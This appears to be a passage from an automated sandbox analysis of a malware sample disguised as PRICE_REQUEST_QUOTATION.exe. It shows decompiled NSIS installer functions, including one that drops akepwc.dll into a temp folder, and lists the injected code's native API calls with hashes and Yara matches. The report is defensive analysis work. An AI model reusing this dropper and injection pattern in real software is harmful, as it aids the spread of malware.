                                        				E00405B25();
                                        				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
                                        				return 0;
                                        			}












                                        APIs
                                        • GetDC.USER32(?), ref: 00401D3F
                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                        • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirect
                                        • String ID:
                                        • API String ID: 3272661963-0
                                        • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                        • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                        • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                        • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00402BF1(intOrPtr _a4) {
                                        				long _t2;
                                        				struct HWND__* _t3;
                                        				struct HWND__* _t6;
                                        
                                        				if(_a4 == 0) {
                                        					__eflags =  *0x420c48; // 0x0
                                        					if(__eflags == 0) {
                                        						_t2 = GetTickCount();
                                        						__eflags = _t2 -  *0x42ec2c;
                                        						if(_t2 >  *0x42ec2c) {
                                        							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
                                        							 *0x420c48 = _t3;
                                        							return ShowWindow(_t3, 5);
                                        						}
                                        						return _t2;
                                        					} else {
                                        						return E00405F93(0);
                                        					}
                                        				} else {
                                        					_t6 =  *0x420c48; // 0x0
                                        					if(_t6 != 0) {
                                        						_t6 = DestroyWindow(_t6);
                                        					}
                                        					 *0x420c48 = 0;
                                        					return _t6;
                                        				}
                                        			}







                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                        • GetTickCount.KERNEL32 ref: 00402C22
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                        • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                        • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                        • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                        				long _t22;
                                        
                                        				if(_a8 != 0x102) {
                                        					if(_a8 != 0x200) {
                                        						_t22 = _a16;
                                        						L7:
                                        						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
                                        							 *0x42a088 = _t22;
                                        							E00405BC7(0x42a0a0, 0x42f000);
                                        							E00405B25(0x42f000, _t22);
                                        							E0040140B(6);
                                        							E00405BC7(0x42f000, 0x42a0a0);
                                        						}
                                        						L11:
                                        						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
                                        					}
                                        					if(IsWindowVisible(_a4) == 0) {
                                        						L10:
                                        						_t22 = _a16;
                                        						goto L11;
                                        					}
                                        					_t22 = E00404782(_a4, 1);
                                        					_a8 = 0x419;
                                        					goto L7;
                                        				}
                                        				if(_a12 != 0x20) {
                                        					goto L10;
                                        				}
                                        				E00403ECF(0x413);
                                        				return 0;
                                        			}





                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00404E39
                                        • CallWindowProcA.USER32 ref: 00404EA7
                                          • Part of subcall function 00403ECF: SendMessageA.USER32 ref: 00403EE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                        • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                        • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                        • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                        				int _t5;
                                        				long _t7;
                                        				struct _OVERLAPPED* _t11;
                                        				intOrPtr* _t15;
                                        				void* _t17;
                                        				int _t21;
                                        
                                        				_t15 = __esi;
                                        				_t11 = __ebx;
                                        				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
                                        					_t7 = lstrlenA(E00402A29(0x11));
                                        				} else {
                                        					E00402A0C(1);
                                        					 *0x40a040 = __al;
                                        				}
                                        				if( *_t15 == _t11) {
                                        					L8:
                                        					 *((intOrPtr*)(_t17 - 4)) = 1;
                                        				} else {
                                        					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll", _t7, _t17 + 8, _t11);
                                        					_t21 = _t5;
                                        					if(_t21 == 0) {
                                        						goto L8;
                                        					}
                                        				}
                                        				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
                                        				return 0;
                                        			}









                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll, xrefs: 004024FD, 00402522
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileWritelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll
                                        • API String ID: 427699356-2535635339
                                        • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                        • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
                                        • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                        • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405427(CHAR* _a4) {
                                        				struct _PROCESS_INFORMATION _v20;
                                        				int _t7;
                                        
                                        				0x42c0a8->cb = 0x44;
                                        				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
                                        				if(_t7 != 0) {
                                        					CloseHandle(_v20.hThread);
                                        					return _v20.hProcess;
                                        				}
                                        				return _t7;
                                        			}





                                        APIs
                                        Strings
                                        • Error launching installer, xrefs: 0040543A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                        • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                        • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                        • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00403585() {
                                        				void* _t2;
                                        				void* _t3;
                                        				void* _t6;
                                        				void* _t8;
                                        
                                        				_t8 =  *0x42905c;
                                        				_t3 = E0040356A(_t2, 0);
                                        				if(_t8 != 0) {
                                        					do {
                                        						_t6 = _t8;
                                        						_t8 =  *_t8;
                                        						FreeLibrary( *(_t6 + 8));
                                        						_t3 = GlobalFree(_t6);
                                        					} while (_t8 != 0);
                                        				}
                                        				 *0x42905c =  *0x42905c & 0x00000000;
                                        				return _t3;
                                        			}







                                        APIs
                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                        • GlobalFree.KERNEL32 ref: 004035A6
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-823278215
                                        • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                        • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                        • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                        • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405701(char* _a4) {
                                        				char* _t3;
                                        				char* _t5;
                                        
                                        				_t5 = _a4;
                                        				_t3 =  &(_t5[lstrlenA(_t5)]);
                                        				while( *_t3 != 0x5c) {
                                        					_t3 = CharPrevA(_t5, _t3);
                                        					if(_t3 > _t5) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				 *_t3 =  *_t3 & 0x00000000;
                                        				return  &(_t3[1]);
                                        			}





                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 00405707
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 00405715
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-1246513382
                                        • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                        • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                        • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                        • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405813(CHAR* _a4, CHAR* _a8) {
                                        				int _t10;
                                        				int _t15;
                                        				CHAR* _t16;
                                        
                                        				_t15 = lstrlenA(_a8);
                                        				_t16 = _a4;
                                        				while(lstrlenA(_t16) >= _t15) {
                                        					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                        					_t10 = lstrcmpiA(_t16, _a8);
                                        					if(_t10 == 0) {
                                        						return _t16;
                                        					}
                                        					_t16 = CharNextA(_t16);
                                        				}
                                        				return 0;
                                        			}






                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                        • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                        • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                        • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        APIs
                                        • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: A:A
                                        • API String ID: 2738559852-2859176346
                                        • Opcode ID: e4391c3208eefa8acb6ab95c494d009940cd7956795b2a0df01ba448159d5c77
                                        • Instruction ID: ab5817959eaaeb00b3b68b78b98493cdb6a9f42c9ecb8cf46a161500422af9f5
                                        • Opcode Fuzzy Hash: e4391c3208eefa8acb6ab95c494d009940cd7956795b2a0df01ba448159d5c77
                                        • Instruction Fuzzy Hash: E1F0EC71200209ABCB08DF89DC94DDB77ADAF8C754F158649FA0D97251DA30E8518BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: A:A
                                        • API String ID: 2738559852-2859176346
                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                        • Instruction ID: 6c7918579f63920fb86cd593affe8adf5c0c2a6eede5319f465e69fff998d711
                                        • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                        • Instruction Fuzzy Hash: 140152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 873533f8731280fd70d58967dd9584c488ce87b4c2b7140c58c93bd96238a518
                                        • Instruction ID: f13fa726c066822f58a3e61737c2b1b42c892671ff4e798296aad1ba3165767d
                                        • Opcode Fuzzy Hash: 873533f8731280fd70d58967dd9584c488ce87b4c2b7140c58c93bd96238a518
                                        • Instruction Fuzzy Hash: 3101AFB2201108ABCB58CF99DC95EEB77A9AF8C354F158248FA0DD7241D630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: d3e0b2438a147bd9e25dfd96366cb08a8fc01704297245828094df7f10d1c80c
                                        • Instruction ID: 290efba4303a253068a3e06cfde146bf2becb0bcfc7eb6aafb9ea7287a74ccc8
                                        • Opcode Fuzzy Hash: d3e0b2438a147bd9e25dfd96366cb08a8fc01704297245828094df7f10d1c80c
                                        • Instruction Fuzzy Hash: 24F030B51101496BCB14DF98DC84CA777A9FF8C264B158A4DFD4897202C234D855CBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 970ffaebdd0900170551bb72a539d9bf047e582836a880ab19da45464d6a4157
                                        • Instruction ID: 91f7fb2e6f1f8d8a2516701943f21fb745bab37a8feea930ebc1e9e8948abf7e
                                        • Opcode Fuzzy Hash: 970ffaebdd0900170551bb72a539d9bf047e582836a880ab19da45464d6a4157
                                        • Instruction Fuzzy Hash: F7D02BA940D2C04FD711FB7468C50C27F80DE5211871859CED8E407503C5649615D391
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID: F5A
                                        • API String ID: 1279760036-683449296
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
